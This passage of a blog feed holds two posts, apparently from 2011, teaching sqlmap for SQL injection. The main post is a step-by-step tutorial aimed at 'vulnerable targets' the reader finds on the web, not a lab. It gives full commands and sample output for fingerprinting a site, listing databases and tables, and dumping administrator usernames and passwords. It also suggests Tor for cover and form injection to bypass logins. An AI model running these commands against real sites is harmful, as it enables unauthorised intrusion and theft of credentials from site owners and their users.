'&amp;nbsp;--mobile' which, like the user-agent argument, allows SQLMAP to act as if it were a mobile device, which can be handy in testing many of the new mobile.site.com spin-off domains built to reach ever expanding consumer markets with very little concern for security or sanitization :)&lt;br /&gt;
&amp;nbsp;Last, but certainly not least, as this can be very helpful in adding to YOUR security: &lt;br /&gt;
' --tor' which enables SQLMAP to perform queries through the default Tor proxy address&lt;br /&gt;
&lt;br /&gt;
Mini-Tutorial on '--forms':&lt;br /&gt;
So you want to inject a search form or try to bypass a basic login page (with the typical two input fields such as user and pass). You can either pass SQLMAP the request in a request file (-r) as noted above, or you can set the $POST data accordingly using the '--data' argument,...&lt;br /&gt;
...or let SQLMAP do it for you!&lt;br /&gt;
Both user and pass from the above example, like most others in real life, appear as &amp;lt;form&amp;gt; and &amp;lt;input&amp;gt; tags in the HTML code, and this is where this switch does its handiwork. Provide SQLMAP with '--forms' as well as the page where the form can be found as the target URL '-u' and SQLMAP will do the rest: it parses the forms it finds on the page provided and interactively guides you through testing the form input fields for SQL injection (rather than performing a normal injection scan on the site provided by '-u').&lt;br /&gt;
&lt;br /&gt;
Hope these help you get a little bit more out of SQLMAP. Still working on adding some more instructions and tutorials regarding the additional features that interact with the filesystem, system registry, and actual command execution with a little help from Metasploit. I am also planning a separate short article on how to perform injections via $POST :)&lt;br /&gt;
&lt;br /&gt;
Until next time...&lt;br /&gt;
Later - H.R.</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/222738385912519542/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/05/sqlmap-volume-2-tips-tricks.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/222738385912519542?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/222738385912519542?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/FetYSCXfI4c/sqlmap-volume-2-tips-tricks.html" title="SQLMAP Volume 2: TIPS &amp; TRICKS" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/05/sqlmap-volume-2-tips-tricks.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A08FQXY6fip7ImA9WhZQGUQ.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-6727102486343827145</id><published>2011-04-28T09:10:00.000-05:00</published><updated>2011-04-28T09:10:10.816-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-04-28T09:10:10.816-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hack" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="tutorial" 
/><category scheme="http://www.blogger.com/atom/ns#" term="SQLi" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL" /><category scheme="http://www.blogger.com/atom/ns#" term="sqlmap" /><title>SQLMAP Basic Introduction and Tutorial</title><content type="html">There are times when manual efforts just won't work or you plain don't have the skills and other famous tools like Havij don't seem to do the trick either. I experienced one of these times recently and it led me to another great tool that just doesn't seem to be as popular - SQLMAP. I had a site the other day I was working on my injections with and could not get it manually due to poor skills at timing things, reading results, and PATIENCE. Havij was cracking out due to the timing method sucking and I don't have the skills to do it manually (props to those that can), so here is a tutorial I put together on how to go about cracking this thing wide open using the less commonly known tool SQLMAP. Let me first start by saying if you are afraid of the command line then just leave now because there is no GUI for this and I don't think there ever will be. If you really want to hack you need to get familiar with it, so why not start now. Let's begin...&lt;br /&gt;
&lt;br /&gt;
There is no need to waste time with $hitcash and other download sites. For a stable and virus free copy just get it from the official site here:&amp;nbsp;&lt;a href="http://sqlmap.sourceforge.net/"&gt;http://sqlmap.sourceforge.net/&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Direct to Download Page: &lt;a href="http://sourceforge.net/projects/sqlmap/files/sqlmap/"&gt;http://sourceforge.net/projects/sqlmap/files/sqlmap/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
You will simply extract this to the folder you want to run and use it from. As mentioned, this is a command line tool, NO GUI. If you want to add it to your PATH variable so you can run it from anywhere the command prompt opens, follow these simple steps:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;1) Right click on Computer and choose Properties option&lt;br /&gt;
&amp;nbsp;2) In the System window click on Advanced system settings in the left pane&lt;br /&gt;
&amp;nbsp;3) In the System Properties window select Advanced tab and click on Environment Variables&lt;br /&gt;
&amp;nbsp;4) In the Environment Variables window you will notice two columns, User variables for a username and System &amp;nbsp;variables - we need to add to the user PATH variable so it knows where to open the program from wherever we decide to open &amp;nbsp;CMD&lt;br /&gt;
&amp;nbsp;5) Now to add a PATH to the User variables, highlight PATH and click on the New… button. In the New User Variable dialog &amp;nbsp;box type the Variable name and Variable value and click the OK button. If you are unsure you can choose to edit the &amp;nbsp;PATH variable to see how it is done (IF YOU CHANGE THIS YOU MAY HAVE PROBLEMS, SO BE CAREFUL). Now just add the path to &amp;nbsp;sqlmap.exe to the end and you're done; hit OK and save.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;5a) To remove a User variable click on the required User variable and then click on Delete button&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;5b) To edit a User variable click on Edit… button. In the Edit User Variable dialog box&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;edit&amp;nbsp;the&amp;nbsp;Variable&amp;nbsp;name and Variable value and click OK button&lt;br /&gt;
&lt;br /&gt;
NOTE: you can skip the path variable part if you want, but then you must be in the folder to run it from the command line (I am lazy and don't like to navigate so I like to set it and forget it)&lt;br /&gt;
&lt;br /&gt;
OK now you should be ready to get started...open the command prompt and type sqlmap or sqlmap.exe to see if you set the path variable correctly. If you get "error: missing a mandatory parameter..." then you are in business. To begin I suggest opening two command prompts at the same time and put them side by side (it will help make this easier to visualize and learn while we go through this tutorial). On one side you need to simply type in 'sqlmap --help' and see what follows, you will quickly see sqlmap has a LOT of options available for you to choose from. I will cover some of the basics to help get you started. Keep the help menu open on one side and now we will begin working from the other side. &lt;br /&gt;
&lt;br /&gt;
I will assume you have done your own searching on the web to find some vulnerable targets, so let's get started testing them. We will use the '-u' option to define our target site, like this:&lt;br /&gt;
&lt;br /&gt;
EX: sqlmap -u &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Results...PHP 5.2.14, Apache 2.2.17, MySQL 5&lt;br /&gt;
This will perform a basic run at the target to test for injection, simply providing basic overview info. We can use the '-f' parameter to get some more specific information from our target, like this:&lt;br /&gt;
&lt;br /&gt;
EX: sqlmap -u &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt; -f&lt;br /&gt;
&lt;br /&gt;
Results are not too much more than previous (you get the column count or vulnerable column if you pay close attention to the info retrieved, as well as&amp;nbsp;specifics on version). The results will also be stored for the entire session in the 'output' folder wherever sqlmap is physically installed - it also shows the commands used to get the info. That doesn't really tell us a lot, so let's grab the site banner to see what it can tell us, as well as some other useful info from the Database itself, by changing up the command and adding a few more parameters, like so:&lt;br /&gt;
&lt;br /&gt;
EX: sqlmap -u &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt; -f -b --current-user --current-db --is-dba --users --dbs&lt;br /&gt;
Results: &lt;br /&gt;
&lt;br /&gt;
NOTE: it seems to process them in the order you pass the arguments, so if it fails along the way you don't get the rest. For this reason I usually start with the above command and then start to change from there to get more info...&lt;br /&gt;
&lt;br /&gt;
-f = Back-end DBMS: active fingerprint: MySQL &amp;gt;= 5.0.38 and &amp;lt; 5.1.2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; comment injection fingerprint: MySQL 5.1.00&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; banner parsing fingerprint: MySQL 5.0.92&lt;br /&gt;
-b = banner:&amp;nbsp;&amp;nbsp;&amp;nbsp; '5.0.92-community'&lt;br /&gt;
--current-user&amp;nbsp; =&amp;nbsp; read from file 'C:\sqlmap-0.8_exe\output\site.com\session': user@localhost&lt;br /&gt;
--current-db = same as above, reads from session file created for scan but shows current database&lt;br /&gt;
--is-dba = same as above, reads from session file created for scan but shows if current user is DBA: 'TRUE' or 'False'&lt;br /&gt;
--users = same as above, reads from session file created for scan but shows&amp;nbsp; number of database users and usernames&lt;br /&gt;
--dbs = same as above, reads from session file created for scan but shows ALL of the databases available, not just current&lt;br /&gt;
&amp;nbsp;current user:&amp;nbsp;&amp;nbsp;&amp;nbsp; 'user@localhost'&lt;br /&gt;
&amp;nbsp;current database: database1&lt;br /&gt;
&amp;nbsp;system users [1]: 'user'@'localhost'&lt;br /&gt;
&amp;nbsp;current user is DBA:&amp;nbsp;&amp;nbsp;&amp;nbsp; 'False'&lt;br /&gt;
&amp;nbsp;available databases [5]:&lt;br /&gt;
&amp;nbsp;[*] information_schema&lt;br /&gt;
&amp;nbsp;[*] database1&lt;br /&gt;
&amp;nbsp;[*] database2&lt;br /&gt;
&amp;nbsp;[*] database3&lt;br /&gt;
&amp;nbsp;[*] database4&lt;br /&gt;
&lt;br /&gt;
This pretty much gets you set up with the basic info. You can go a step further and add '--passwords' to the end of the command to try and extract the passwords for database users if they are available. This is not always effective though (i.e. no MySQL table), which is why it is best to add it after the basics or at the end of your recon session, like so:&lt;br /&gt;
&lt;br /&gt;
EX: sqlmap -u &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt; -f -b --current-user --current-db --is-dba --users --dbs --passwords&lt;br /&gt;
&lt;br /&gt;
OR by itself following our recon command like this:&lt;br /&gt;
&lt;br /&gt;
EX: sqlmap -u &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt; --passwords&lt;br /&gt;
&lt;br /&gt;
You can also check user privileges with '--privileges' as well as roles with '--roles'..., but what if you want to dig deeper into the Database(s) to find more info? No problem....let's keep going and extract all of the table names and columns...&lt;br /&gt;
&lt;br /&gt;
Now we need to keep it simple and just request what we need using these new parameters: '--tables', '--columns', and '-D', like this:&lt;br /&gt;
&lt;br /&gt;
EX: sqlmap -u &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt; --tables -D database1&lt;br /&gt;
&lt;br /&gt;
Results....it will load all of the results into the log file stored in the "output" folder wherever you installed sqlmap physically on your system, while it also prints the results to the screen. &lt;br /&gt;
&lt;br /&gt;
The results would look something like this:&lt;br /&gt;
[16:10:05] [INFO] fetching tables for database 'database1'&lt;br /&gt;
[16:10:05] [INFO] fetching number of tables for database 'database1'&lt;br /&gt;
[16:10:05] [INFO] retrieved: 13&lt;br /&gt;
[16:10:16] [INFO] retrieved: access&lt;br /&gt;
[16:10:53] [INFO] retrieved: action&lt;br /&gt;
[16:11:40] [INFO] retrieved: ad&lt;br /&gt;
[16:11:55] [INFO] retrieved: adcriteria&lt;br /&gt;
[16:13:02] [INFO] retrieved: adminhelp&lt;br /&gt;
[16:13:56] [INFO] retrieved: administrator&lt;br /&gt;
[16:15:14] [INFO] retrieved: adminlog&lt;br /&gt;
[16:16:00] [INFO] retrieved: adminmessage&lt;br /&gt;
[16:17:26] [INFO] retrieved: bbcode&lt;br /&gt;
[16:18:26] [INFO] retrieved: config&lt;br /&gt;
[16:19:26] [INFO] retrieved: db_users&lt;br /&gt;
[16:20:26] [INFO] retrieved: users&lt;br /&gt;
[16:21:26] [INFO] retrieved: etc&lt;br /&gt;
Database: database1&lt;br /&gt;
[13 tables]&lt;br /&gt;
+-----------------+&lt;br /&gt;
| access&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | &lt;br /&gt;
| action&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| ad&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| adcriteria&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| adminhelp&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| administrator&amp;nbsp;&amp;nbsp;&amp;nbsp;|&lt;br /&gt;
| adminlog&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| adminmessage&amp;nbsp;|&lt;br /&gt;
| bbcode&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;|&lt;br /&gt;
| config&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| db_users&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;|&lt;br /&gt;
| users&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| etc&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;|&lt;br /&gt;
+-----------------+&lt;br /&gt;
....and so on until it is done finding all of the tables for the database you specified with the '-D database1' parameter earlier...and now we find the columns for the tables found above...&lt;br /&gt;
&lt;br /&gt;
EX: sqlmap -u &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt; --columns -D database1 -T administrator&lt;br /&gt;
&lt;br /&gt;
Results....remember you can check your logs in "output" folder...The results would look something like this:&lt;br /&gt;
[16:30:05] [INFO] fetching columns for table 'administrator' on database 'database1'&lt;br /&gt;
[16:33:05] [INFO] fetching number of columns for table 'administrator' on database 'database1'&lt;br /&gt;
[16:36:05] [INFO] retrieved: 3&lt;br /&gt;
[16:39:16] [INFO] retrieved: user&lt;br /&gt;
[16:45:53] [INFO] retrieved: pass&lt;br /&gt;
[16:46:40] [INFO] retrieved: id&lt;br /&gt;
[16:49:26] [INFO] retrieved: etc&lt;br /&gt;
Database: database1&lt;br /&gt;
Table: administrator&lt;br /&gt;
[3 Columns]&lt;br /&gt;
+-----------+----------------+&lt;br /&gt;
| Column&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Type&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
+-----------+----------------+&lt;br /&gt;
| user&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;| varchar(250) |&lt;br /&gt;
| pass&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | varchar(250) |&lt;br /&gt;
| ID&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | int(11)&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
| etc&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;varchar(100) |&lt;br /&gt;
+-----------+----------------+&lt;br /&gt;
....and so it goes on until it is done finding all of the columns and tables for the database you specified with the '-D database1 -T administrator' parameters earlier...BUT now you may be asking yourself, how do we get that precious data out of there?&lt;br /&gt;
&lt;br /&gt;
Like this:&lt;br /&gt;
EX: sqlmap -u &lt;a href="http://site.com/example.php?id=1"&gt;http://site.com/example.php?id=1&lt;/a&gt; --dump -D database1 -T administrator -C user,pass,id&lt;br /&gt;
&lt;br /&gt;
Results....remember you can check your logs in "output" folder...The results would look something like this:&lt;br /&gt;
[18:51:57] [INFO] fetching columns 'user, pass, id' entries for table&lt;br /&gt;
&amp;nbsp;'administrator' on database 'database1'&lt;br /&gt;
[18:51:57] [INFO] fetching number of columns 'user, pass, id' entries for table 'administrator' on database 'database1'&lt;br /&gt;
[18:51:57] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 2&lt;br /&gt;
[18:51:57] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 1&lt;br /&gt;
[18:51:57] [INFO] retrieved: IhazYOURpassWZORD&lt;br /&gt;
[18:52:52] [INFO] retrieved: admin&lt;br /&gt;
[18:53:34] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 2&lt;br /&gt;
[18:53:34] [INFO] retrieved: IhazYOURpassWZORDtoo&lt;br /&gt;
[18:54:34] [INFO] retrieved: JohnDoe&lt;br /&gt;
Database: database1&lt;br /&gt;
Table: administrators&lt;br /&gt;
[2 entries]&lt;br /&gt;
+-----+---------------------------------+------------+&lt;br /&gt;
|&amp;nbsp;&amp;nbsp; ID&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; Password&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;user&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;
+-----+---------------------------------+------------+&lt;br /&gt;
| 1&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; |&amp;nbsp; IhazYOURpassWORD&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;|&amp;nbsp;&amp;nbsp;&amp;nbsp; admin&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;|&lt;br /&gt;
| 2&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; | IhazYOURpassWORDtoo&amp;nbsp; | JohnDoe&amp;nbsp; &amp;nbsp;|&lt;br /&gt;
+-----+---------------------------------+------------+&lt;br /&gt;
[18:55:14] [INFO] Table 'database1.administrator' dumped to CSV file 'C:\sqlmap-0.8_e&lt;br /&gt;
xe\output\www.site.com\dump\database1\administrator.csv'&lt;br /&gt;
[18:55:14] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.8_exe\out&lt;br /&gt;
put\www.site.com'&lt;br /&gt;
That sums up our basic introduction to SQLMAP. Ideas for next series...SQLMAP Round 2: From Dumping to Owning the DB Server. Using ninja skills with sqlmap to interact with the system registry and filesystem access, as well as gaining access to the underlying operating system and executing system commands with a little assistance from the incorporation of&amp;nbsp;Metasploit to the attack scenario. I hope you enjoyed this episode and stay tuned for more to come in the next series...&lt;br /&gt;
&lt;br /&gt;
Later - H.R.</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/6727102486343827145/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/04/sqlmap-basic-introduction-and-tutorial.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/6727102486343827145?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/6727102486343827145?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/x8pQvp02540/sqlmap-basic-introduction-and-tutorial.html" title="SQLMAP Basic Introduction and Tutorial" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>4</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/04/sqlmap-basic-introduction-and-tutorial.html</feedburner:origLink></entry></feed>

